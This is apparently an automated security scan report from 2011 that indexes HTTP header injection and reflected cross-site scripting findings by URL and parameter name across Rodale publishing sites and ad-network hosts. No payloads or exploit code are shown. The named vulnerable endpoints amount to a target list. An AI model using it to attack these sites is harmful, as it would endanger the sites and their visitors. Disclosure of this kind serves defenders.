XSS, HTTP Header Injection Cross Site Scripting, CWE-79, CWE-113, DORK Report for March 11, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Mar 11 11:36:42 CST 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

1. HTTP header injection

1.1. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 1]

1.2. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 2]

1.3. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 1]

1.4. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 2]

1.5. http://ad.doubleclick.net/ad/N2434.127885.1691942218421/B5055470.38 [REST URL parameter 1]

1.6. http://ad.doubleclick.net/ad/N2724.rodale.com/B4504763.19 [REST URL parameter 1]

1.7. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.10 [REST URL parameter 1]

1.8. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.2 [REST URL parameter 1]

1.9. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.3 [REST URL parameter 1]

1.10. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.4 [REST URL parameter 1]

1.11. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.5 [REST URL parameter 1]

1.12. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.7 [REST URL parameter 1]

1.13. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.8 [REST URL parameter 1]

1.14. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.9 [REST URL parameter 1]

1.15. http://ad.doubleclick.net/ad/N5767.womenshealthmagOX4554/B4627079.35 [REST URL parameter 1]

1.16. http://ad.doubleclick.net/ad/N6138.127885.WOMENSHEALTH/B5295230.17 [REST URL parameter 1]

1.17. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.20 [REST URL parameter 1]

1.18. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.24 [REST URL parameter 1]

1.19. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.25 [REST URL parameter 1]

1.20. http://ad.doubleclick.net/ad/N6357.menshealth.comOX4549/B4645123.52 [REST URL parameter 1]

1.21. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [REST URL parameter 1]

1.22. http://ad.doubleclick.net/adj/bicycling/home [REST URL parameter 1]

1.23. http://ad.doubleclick.net/adj/menshealth/home [REST URL parameter 1]

1.24. http://ad.doubleclick.net/adj/organicgardening/home [REST URL parameter 1]

1.25. http://ad.doubleclick.net/adj/prevention/home [REST URL parameter 1]

1.26. http://ad.doubleclick.net/adj/prevention/lifelongbeauty [REST URL parameter 1]

1.27. http://ad.doubleclick.net/adj/rodale/fitness [REST URL parameter 1]

1.28. http://ad.doubleclick.net/adj/runnersworld/community [REST URL parameter 1]

1.29. http://ad.doubleclick.net/adj/runnersworld/home [REST URL parameter 1]

1.30. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.31. http://ad.doubleclick.net/imp [REST URL parameter 1]

1.32. http://amch.questionmarket.com/adsc/d876089/3/885674/adscout.php [ES cookie]

1.33. http://amch.questionmarket.com/adsc/d876089/3/885678/adscout.php [ES cookie]

1.34. http://amch.questionmarket.com/adsc/d876089/3/885679/adscout.php [ES cookie]

1.35. http://amch.questionmarket.com/adsc/d876089/8/40909683/decide.php [ES cookie]

1.36. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.37. http://amch.questionmarket.com/adscgen/st.php [site parameter]

1.38. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

1.39. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

1.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

1.41. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

1.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

2.2. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

2.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]

2.4. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

2.5. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]

2.6. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]

2.7. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sz parameter]

2.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

2.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

2.10. http://button.topsy.com/widget/retweet-json [callback parameter]

2.11. http://button.topsy.com/widget/retweet-json [id parameter]

2.12. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

2.13. http://ds.addthis.com/red/psi/sites/www.prevention.com/p.json [callback parameter]

2.14. http://recipes.rodale.com/homepage.aspx [name of an arbitrarily supplied request parameter]

2.15. http://remedies.rodale.com/favicon.ico [REST URL parameter 1]

2.16. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostCommented [plckElementId parameter]

2.17. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostRecommended [plckElementId parameter]

2.18. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecent [plckElementId parameter]

2.19. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]

2.20. http://sitelife.runnersworld.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]

2.21. http://video.bicycling.com/decor/javascript/elements.js [REST URL parameter 1]

2.22. http://video.bicycling.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]

2.23. http://video.bicycling.com/decor/javascript/magnify_stats.js [REST URL parameter 1]

2.24. http://video.bicycling.com/decor/live/transparent.gif [REST URL parameter 1]

2.25. http://video.bicycling.com/decor/track/dot.gif [REST URL parameter 1]

2.26. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 1]

2.27. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 2]

2.28. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [name of an arbitrarily supplied request parameter]

2.29. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 1]

2.30. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 2]

2.31. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.32. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.33. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.34. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.35. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 6]

2.36. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [referrer parameter]

2.37. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 1]

2.38. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 2]

2.39. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.40. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.41. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.42. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.43. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 6]

2.44. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [referrer parameter]

2.45. http://video.bicycling.com/favicon.ico [REST URL parameter 1]

2.46. http://video.bicycling.com/services/usage_request [REST URL parameter 1]

2.47. http://video.bicycling.com/services/usage_request [REST URL parameter 2]

2.48. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]

2.49. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]

2.50. http://www.menshealth.com/cda/expertoverview.do [site parameter]

2.51. http://www.menshealth.com/cda/expertoverview.do [site parameter]

2.52. http://www.menshealth.com/cda/featured_video.do [site parameter]

2.53. http://www.menshealth.com/cda/featured_video.do [site parameter]

2.54. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]

2.55. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]

2.56. http://www.menshealth.com/cda/toolsandquizzes_index.do [topic parameter]

2.57. http://www.menshealth.com/downloads/all/ [cm_sp parameter]

2.58. http://www.menshealth.com/downloads/all/ [download_type parameter]

2.59. http://www.menshealth.com/downloads/all/ [download_type parameter]

2.60. http://www.menshealth.com/downloads/all/ [name of an arbitrarily supplied request parameter]

2.61. http://www.menshealth.com/downloads/fitness/ [name of an arbitrarily supplied request parameter]

2.62. http://www.menshealth.com/downloads/sex-and-relationships/ [name of an arbitrarily supplied request parameter]

2.63. http://www.menshealth.com/fitness/cardio-activities/recent-10 [REST URL parameter 2]

2.64. http://www.menshealth.com/fitness/getting-started/recent-10 [REST URL parameter 2]

2.65. http://www.menshealth.com/fitness/muscle-building/recent-10 [REST URL parameter 2]

2.66. http://www.menshealth.com/fitness/sports-injuries/recent-10 [REST URL parameter 2]

2.67. http://www.menshealth.com/mhlists/Best_and_Worst_Cities_for_Men_2010/ [name of an arbitrarily supplied request parameter]

2.68. http://www.menshealth.com/mhlists/change_your_workout/ [name of an arbitrarily supplied request parameter]

2.69. http://www.menshealth.com/mhlists/lose_weight/index.php [name of an arbitrarily supplied request parameter]

2.70. http://www.menshealth.com/mhlists/sculpt_rock_hard_abs/index.php [name of an arbitrarily supplied request parameter]

2.71. http://www.menshealth.com/mhlists/women_s_secrets/ [name of an arbitrarily supplied request parameter]

2.72. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 5]

2.73. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 6]

2.74. http://www.prevention.com/cda/categorypage.do [category parameter]

2.75. http://www.prevention.com/cda/categorypage.do [category parameter]

2.76. http://www.prevention.com/cda/categorypage.do [category parameter]

2.77. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.78. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.79. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.80. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.81. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.82. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.83. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.84. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.85. http://www.prevention.com/cda/newslettersignup.do [source parameter]

2.86. http://www.prevention.com/cda/newslettersignup.do [source parameter]

2.87. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.88. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.89. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.90. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.91. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]

2.92. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]

2.93. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]

2.94. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.95. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.96. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 4]

2.97. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 5]

2.98. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 6]

2.99. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]

2.100. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]

2.101. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 4]

2.102. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 5]

2.103. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 6]

2.104. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]

2.105. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]

2.106. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 4]

2.107. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 5]

2.108. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 6]

2.109. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]

2.110. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]

2.111. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 4]

2.112. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 5]

2.113. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 6]

2.114. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]

2.115. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]

2.116. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]

2.117. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]

2.118. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 4]

2.119. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.120. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.121. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 4]

2.122. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 5]

2.123. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 6]

2.124. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]

2.125. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]

2.126. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 4]

2.127. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]

2.128. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]

2.129. http://www.rodale.com/ [name of an arbitrarily supplied request parameter]

2.130. http://www.rodale.com/1,6597,8-114,00.html [REST URL parameter 1]

2.131. http://www.rodale.com/1,6597,8-114,00.html [name of an arbitrarily supplied request parameter]

2.132. http://www.rodale.com/benefits-walking [REST URL parameter 1]

2.133. http://www.rodale.com/benefits-walking [name of an arbitrarily supplied request parameter]

2.134. http://www.rodale.com/cas [REST URL parameter 1]

2.135. http://www.rodale.com/caslogin [REST URL parameter 1]

2.136. http://www.rodale.com/chemicals-plastic [REST URL parameter 1]

2.137. http://www.rodale.com/chemicals-plastic [name of an arbitrarily supplied request parameter]

2.138. http://www.rodale.com/contact [REST URL parameter 1]

2.139. http://www.rodale.com/contact [name of an arbitrarily supplied request parameter]

2.140. http://www.rodale.com/cookware-comparison [REST URL parameter 1]

2.141. http://www.rodale.com/cookware-comparison [name of an arbitrarily supplied request parameter]

2.142. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 1]

2.143. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 2]

2.144. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 3]

2.145. http://www.rodale.com/corp/sub/0,,1-28,00.html [name of an arbitrarily supplied request parameter]

2.146. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 1]

2.147. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 2]

2.148. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 3]

2.149. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [name of an arbitrarily supplied request parameter]

2.150. http://www.rodale.com/cracker-recipes [REST URL parameter 1]

2.151. http://www.rodale.com/cracker-recipes [name of an arbitrarily supplied request parameter]

2.152. http://www.rodale.com/crib-safety [REST URL parameter 1]

2.153. http://www.rodale.com/crib-safety [name of an arbitrarily supplied request parameter]

2.154. http://www.rodale.com/edible-insects [REST URL parameter 1]

2.155. http://www.rodale.com/edible-insects [name of an arbitrarily supplied request parameter]

2.156. http://www.rodale.com/environment [REST URL parameter 1]

2.157. http://www.rodale.com/environment [name of an arbitrarily supplied request parameter]

2.158. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 1]

2.159. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 2]

2.160. http://www.rodale.com/fitness [REST URL parameter 1]

2.161. http://www.rodale.com/fitness [name of an arbitrarily supplied request parameter]

2.162. http://www.rodale.com/food [REST URL parameter 1]

2.163. http://www.rodale.com/food [name of an arbitrarily supplied request parameter]

2.164. http://www.rodale.com/green-kitchen-safety-tips [REST URL parameter 1]

2.165. http://www.rodale.com/green-kitchen-safety-tips [name of an arbitrarily supplied request parameter]

2.166. http://www.rodale.com/green-school-supplies [REST URL parameter 1]

2.167. http://www.rodale.com/green-school-supplies [name of an arbitrarily supplied request parameter]

2.168. http://www.rodale.com/happiest-place-live-united-states [REST URL parameter 1]

2.169. http://www.rodale.com/happiest-place-live-united-states [name of an arbitrarily supplied request parameter]

2.170. http://www.rodale.com/health [REST URL parameter 1]

2.171. http://www.rodale.com/health [name of an arbitrarily supplied request parameter]

2.172. http://www.rodale.com/heart-attack-triggers [REST URL parameter 1]

2.173. http://www.rodale.com/heart-attack-triggers [name of an arbitrarily supplied request parameter]

2.174. http://www.rodale.com/how-prevent-hangover [REST URL parameter 1]

2.175. http://www.rodale.com/how-prevent-hangover [name of an arbitrarily supplied request parameter]

2.176. http://www.rodale.com/lean-belly-prescription-0 [REST URL parameter 1]

2.177. http://www.rodale.com/lean-belly-prescription-0 [name of an arbitrarily supplied request parameter]

2.178. http://www.rodale.com/living [REST URL parameter 1]

2.179. http://www.rodale.com/living [name of an arbitrarily supplied request parameter]

2.180. http://www.rodale.com/natural-sleep-remedies [REST URL parameter 1]

2.181. http://www.rodale.com/natural-sleep-remedies [name of an arbitrarily supplied request parameter]

2.182. http://www.rodale.com/news [REST URL parameter 1]

2.183. http://www.rodale.com/news [name of an arbitrarily supplied request parameter]

2.184. http://www.rodale.com/our-board-advisors [REST URL parameter 1]

2.185. http://www.rodale.com/our-board-advisors [name of an arbitrarily supplied request parameter]

2.186. http://www.rodale.com/our-site-policies [REST URL parameter 1]

2.187. http://www.rodale.com/our-site-policies [name of an arbitrarily supplied request parameter]

2.188. http://www.rodale.com/plastic-bag-ban [REST URL parameter 1]

2.189. http://www.rodale.com/plastic-bag-ban [name of an arbitrarily supplied request parameter]

2.190. http://www.rodale.com/plastic-free [REST URL parameter 1]

2.191. http://www.rodale.com/plastic-free [name of an arbitrarily supplied request parameter]

2.192. http://www.rodale.com/point-view [REST URL parameter 1]

2.193. http://www.rodale.com/point-view [name of an arbitrarily supplied request parameter]

2.194. http://www.rodale.com/recipe_query_redirect.php [REST URL parameter 1]

2.195. http://www.rodale.com/rodale-story [REST URL parameter 1]

2.196. http://www.rodale.com/rodale_coreg/post [REST URL parameter 1]

2.197. http://www.rodale.com/rodale_coreg/post [REST URL parameter 2]

2.198. http://www.rodale.com/rodalecom-team [REST URL parameter 1]

2.199. http://www.rodale.com/rodalecom-team [name of an arbitrarily supplied request parameter]

2.200. http://www.rodale.com/rss-feeds [REST URL parameter 1]

2.201. http://www.rodale.com/rss-feeds [name of an arbitrarily supplied request parameter]

2.202. http://www.rodale.com/rss.xml [REST URL parameter 1]

2.203. http://www.rodale.com/search/google_appliance [REST URL parameter 1]

2.204. http://www.rodale.com/search/google_appliance [REST URL parameter 2]

2.205. http://www.rodale.com/search/google_appliance [name of an arbitrarily supplied request parameter]

2.206. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 1]

2.207. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]

2.208. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]

2.209. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]

2.210. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]

2.211. http://www.rodale.com/search/google_appliance/BPA [name of an arbitrarily supplied request parameter]

2.212. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 1]

2.213. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]

2.214. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]

2.215. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 3]

2.216. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 3]

2.217. http://www.rodale.com/search/google_appliance/Cleaning [name of an arbitrarily supplied request parameter]

2.218. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 1]

2.219. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 2]

2.220. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 2]

2.221. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 3]

2.222. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 3]

2.223. http://www.rodale.com/search/google_appliance/Food+Safety [name of an arbitrarily supplied request parameter]

2.224. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 1]

2.225. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 2]

2.226. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 2]

2.227. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 3]

2.228. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 3]

2.229. http://www.rodale.com/search/google_appliance/Organic+Food [name of an arbitrarily supplied request parameter]

2.230. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 1]

2.231. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 2]

2.232. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 2]

2.233. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 3]

2.234. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 3]

2.235. http://www.rodale.com/search/google_appliance/Organic+Gardening [name of an arbitrarily supplied request parameter]

2.236. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 1]

2.237. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 2]

2.238. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 2]

2.239. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 3]

2.240. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 3]

2.241. http://www.rodale.com/search/google_appliance/Pesticides [name of an arbitrarily supplied request parameter]

2.242. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 1]

2.243. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 2]

2.244. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 2]

2.245. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 3]

2.246. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 3]

2.247. http://www.rodale.com/search/google_appliance/Recipes [name of an arbitrarily supplied request parameter]

2.248. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 1]

2.249. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 2]

2.250. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 2]

2.251. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 3]

2.252. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 3]

2.253. http://www.rodale.com/search/google_appliance/Stress [name of an arbitrarily supplied request parameter]

2.254. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 1]

2.255. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 2]

2.256. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 2]

2.257. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 3]

2.258. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 3]

2.259. http://www.rodale.com/search/google_appliance/Weight+Loss [name of an arbitrarily supplied request parameter]

2.260. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 1]

2.261. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 2]

2.262. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 3]

2.263. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 4]

2.264. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 5]

2.265. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 6]

2.266. http://www.rodale.com/topic/acid-reflux [REST URL parameter 1]

2.267. http://www.rodale.com/topic/acid-reflux [REST URL parameter 2]

2.268. http://www.rodale.com/topic/acid-reflux [name of an arbitrarily supplied request parameter]

2.269. http://www.rodale.com/topic/addadhd [REST URL parameter 1]

2.270. http://www.rodale.com/topic/addadhd [REST URL parameter 2]

2.271. http://www.rodale.com/topic/addadhd [name of an arbitrarily supplied request parameter]

2.272. http://www.rodale.com/topic/aging [REST URL parameter 1]

2.273. http://www.rodale.com/topic/aging [REST URL parameter 2]

2.274. http://www.rodale.com/topic/aging [name of an arbitrarily supplied request parameter]

2.275. http://www.rodale.com/topic/air-pollution-0 [REST URL parameter 1]

2.276. http://www.rodale.com/topic/air-pollution-0 [REST URL parameter 2]

2.277. http://www.rodale.com/topic/air-pollution-0 [name of an arbitrarily supplied request parameter]

2.278. http://www.rodale.com/topic/alcohol [REST URL parameter 1]

2.279. http://www.rodale.com/topic/alcohol [REST URL parameter 2]

2.280. http://www.rodale.com/topic/alcohol [name of an arbitrarily supplied request parameter]

2.281. http://www.rodale.com/topic/allergies [REST URL parameter 1]

2.282. http://www.rodale.com/topic/allergies [REST URL parameter 2]

2.283. http://www.rodale.com/topic/allergies [name of an arbitrarily supplied request parameter]

2.284. http://www.rodale.com/topic/alternative-medicine [REST URL parameter 1]

2.285. http://www.rodale.com/topic/alternative-medicine [REST URL parameter 2]

2.286. http://www.rodale.com/topic/alternative-medicine [name of an arbitrarily supplied request parameter]

2.287. http://www.rodale.com/topic/anger-management [REST URL parameter 1]

2.288. http://www.rodale.com/topic/anger-management [REST URL parameter 2]

2.289. http://www.rodale.com/topic/anger-management [name of an arbitrarily supplied request parameter]

2.290. http://www.rodale.com/topic/antibacterial-soaps-and-cleaners [REST URL parameter 1]

2.291. http://www.rodale.com/topic/antibacterial-soaps-and-cleaners [REST URL parameter 2]

2.292. http://www.rodale.com/topic/antibacterial-soaps-and-cleaners [name of an arbitrarily supplied request parameter]

2.293. http://www.rodale.com/topic/antioxidants-0 [REST URL parameter 1]

2.294. http://www.rodale.com/topic/antioxidants-0 [REST URL parameter 2]

2.295. http://www.rodale.com/topic/antioxidants-0 [name of an arbitrarily supplied request parameter]

2.296. http://www.rodale.com/topic/anxiety [REST URL parameter 1]

2.297. http://www.rodale.com/topic/anxiety [REST URL parameter 2]

2.298. http://www.rodale.com/topic/anxiety [name of an arbitrarily supplied request parameter]

